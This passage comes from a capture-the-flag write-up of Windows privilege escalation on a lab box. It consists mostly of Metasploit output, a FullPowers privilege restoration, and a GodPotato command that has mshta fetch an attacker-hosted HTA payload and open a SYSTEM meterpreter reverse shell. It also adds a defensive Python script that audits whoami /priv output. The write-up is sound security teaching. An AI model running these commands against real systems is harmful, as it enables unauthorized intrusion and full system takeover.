 11  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 12  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 13  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 14  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found                                                                                                                                                       
 15  exploit/windows/local/capcom_sys_exec                          No                       Cannot reliably check exploitability.
 16  exploit/windows/local/cve_2019_1458_wizardopium                No                       The target is not exploitable.
 17  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The check raised an exception.
 18  exploit/windows/local/cve_2020_0796_smbghost                   No                       The target is not exploitable.
 19  exploit/windows/local/cve_2020_1054_drawiconex_lpe             No                       The target is not exploitable. No target for win32k.sys version 10.0.17763.4840                                                                                                                                            
 20  exploit/windows/local/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.
 21  exploit/windows/local/cve_2020_17136                           No                       The check raised an exception.
 22  exploit/windows/local/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.
 23  exploit/windows/local/cve_2021_40449                           No                       The check raised an exception.
 24  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.
 25  exploit/windows/local/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. The exploit only supports Windows 11 22H2                                                                                                                                                   
 26  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 27  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 28  exploit/windows/local/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store                                                                                                                                                
 29  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows 2016+ (10.0 Build 17763). is not vulnerable                                                                                                                                         
 30  exploit/windows/local/ms14_058_track_popup_menu                No                       Cannot reliably check exploitability.
 31  exploit/windows/local/ms15_051_client_copy_image               No                       The target is not exploitable.
 32  exploit/windows/local/ms15_078_atmfd_bof                       No                       Cannot reliably check exploitability.
 33  exploit/windows/local/ms16_014_wmi_recv_notif                  No                       The target is not exploitable.
 34  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
 35  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 36  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 37  exploit/windows/local/nvidia_nvsvc                             No                       The check raised an exception.
 38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 40  exploit/windows/local/srclient_dll_hijacking                   No                       The target is not exploitable. Target is not Windows Server 2012.                                                                                                                                                          
 41  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 42  exploit/windows/local/virtual_box_opengl_escape                No                       The target is not exploitable.
 43  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > 
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 4443
LPORT => 4443
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.68:4443 
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\udUCTAa.ps1...
[*] Compressing script contents...
[+] Compressed size: 3743
[*] Executing exploit script...
         __ __ ___ ___   ___     ___ ___ ___ 
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|
                                            
                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[!] No valid thread handle was captured, exiting!

[+] Executed on target machine.
[+] Deleted C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\udUCTAa.ps1
[*] Exploit completed, but no session was created.

msf6 exploit(windows/local/bypassuac_dotnet_profiler) > use exploit/windows/local/cve_2022_21882_win32k
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21882_win32k) > show options

Module options (exploit/windows/local/cve_2022_21882_win32k):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.68      yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 10 v1803-21H2 x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2022_21882_win32k) > run

[*] Started reverse TCP handler on 10.10.14.68:4443 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 2796 launched.
[*] Reflectively injecting the DLL into 2796...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2022_21882_win32k) > 

Well, I tried a number of things, including migrating to another process, but none of it worked.

FullPowers

Let's check the privileges this shell holds.

C:\xampp\htdocs>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

For an NT AUTHORITY\LOCAL SERVICE user, this looks like an unusually small set of privileges.
Looking into this situation, you can find the following article.

We'll use FullPowers, a tool that can break out of this situation.

C:\xampp\htdocs\uploads>.\FullPowers.exe
.\FullPowers.exe
[+] Started dummy thread with id 2052
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

C:\Windows\system32>

The impersonation privileges are back! Since we now have SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, the Potato family of tools looks usable!!
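To make the before/after difference concrete, here is a small audit helper that parses `whoami /priv` output and flags the privileges that permit token impersonation. This is an added example for this writeup, not a tool from the box or from the FullPowers/GodPotato projects; the two sample outputs are constructed to mirror the shell state shown above (a stripped-down service token, then the restored default one), and the privilege list it checks against is an assumption based on the two privileges named in this section. A defender can run the same check over `whoami /priv` output collected from service processes to find accounts whose tokens still carry these privileges.

```python
"""Audit `whoami /priv` output for token privileges that enable
impersonation-based escalation (added example, not part of the original
writeup). The two sample outputs below are constructed to mirror the
before/after FullPowers state shown in this section."""
import re

# Privileges that, when present and enabled on a service account's token,
# are what the Potato family of tools relies on (assumption: list taken
# from the two privileges discussed in the writeup).
IMPERSONATION_PRIVS = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# Constructed sample: the stripped-down token of the initial shell.
BEFORE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Constructed sample: the token after the default service privileges return.
AFTER = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(output: str) -> dict[str, bool]:
    """Map each privilege name in `whoami /priv` output to True if Enabled."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def impersonation_risk(output: str) -> list[str]:
    """Return the enabled privileges that make token impersonation possible."""
    privs = parse_privileges(output)
    return sorted(p for p, enabled in privs.items()
                  if enabled and p in IMPERSONATION_PRIVS)


def privilege_diff(before: str, after: str) -> list[str]:
    """Privileges present in `after` that were absent from `before`."""
    return sorted(set(parse_privileges(after)) - set(parse_privileges(before)))


if __name__ == "__main__":
    print("before:", impersonation_risk(BEFORE))   # no impersonation privileges
    print("after: ", impersonation_risk(AFTER))    # the two privileges that matter
    print("gained:", privilege_diff(BEFORE, AFTER))
```

The useful takeaway for hardening is the first result: a service token with no impersonation privileges is the state a least-privilege service should stay in, so a process running as LOCAL SERVICE or NETWORK SERVICE that reports either privilege as Enabled is worth a closer look.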

GodPotato

After downloading GodPotato from the link below, upload it to the target.

meterpreter > upload GodPotato-NET4.exe
[*] Uploading  : /root/work/GodPotato-NET4.exe -> GodPotato-NET4.exe
[*] Uploaded 56.00 KiB of 56.00 KiB (100.0%): /root/work/GodPotato-NET4.exe -> GodPotato-NET4.exe
[*] Completed  : /root/work/GodPotato-NET4.exe -> GodPotato-NET4.exe
meterpreter > 

The command we run through GodPotato uses mshta, the same as before.
For that, start the hta_server in Metasploit again.

┌──(root㉿kali)-[~]
└─# msfconsole 
                                                  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v6.3.31-dev                          ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search windows/misc/hta_server

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  exploit/windows/misc/hta_server  2016-10-06       manual  No     HTA Web Server


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/hta_server

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen
                                        on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/hta_server) > set SRVHOST 10.10.14.68
SRVHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set LHOST 10.10.14.68
LHOST => 10.10.14.68
msf6 exploit(windows/misc/hta_server) > set LPORT 1234
LPORT => 1234
msf6 exploit(windows/misc/hta_server) > set SRVPORT 8082
SRVPORT => 8082
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.68:1234 
[*] Using URL: http://10.10.14.68:8082/4EcVLJy.hta
msf6 exploit(windows/misc/hta_server) >

Launch GodPotato from the shell that now holds those privileges.

C:\xampp\htdocs\uploads>GodPotato-NET4.exe -cmd "mshta.exe http://10.10.14.68:8082/4EcVLJy.hta"
GodPotato-NET4.exe -cmd "mshta.exe http://10.10.14.68:8082/4EcVLJy.hta"
[*] CombaseModule: 0x140731624849408
[*] DispatchTable: 0x140731627155568
[*] UseProtseqFunction: 0x140731626531744
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\ee78db9b-751c-4d3b-a7d8-818ac4263826\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000802-112c-ffff-aebb-d0f19a47a266
[*] DCOM obj OXID: 0x77f1c22c75d16e8e
[*] DCOM obj OID: 0xa3991dac85cf3ef4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 860 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4432

C:\xampp\htdocs\uploads>
[*] Server started.
[*] 10.10.11.234     hta_server - Delivering Payload
[*] Sending stage (175686 bytes) to 10.10.11.234
[*] Meterpreter session 1 opened (10.10.14.68:1234 -> 10.10.11.234:51679) at 2023-10-14 07:56:02 -0400

msf6 exploit(windows/misc/hta_server) > show sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ VISUAL  10.10.14.68:1234 -> 10.10.11.234:51679 (10.10.11.234)

msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > guid
[+] Session GUID: 93c0b1bb-ff6d-4879-8b7b-70af0627e3c0
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

We've obtained SYSTEM privileges! Now we can grab the root flag!

Summary

With that, privilege escalation succeeded and we obtained root privileges.
I got the user flag by attacking from Windows. It took a lot of effort before this payload landed. It seems I also need to set up a proper attack environment on Windows.
After the user flag, the rest was a fairly standard path, wasn't it?

As always, I hope this is helpful to my fellow security engineers.
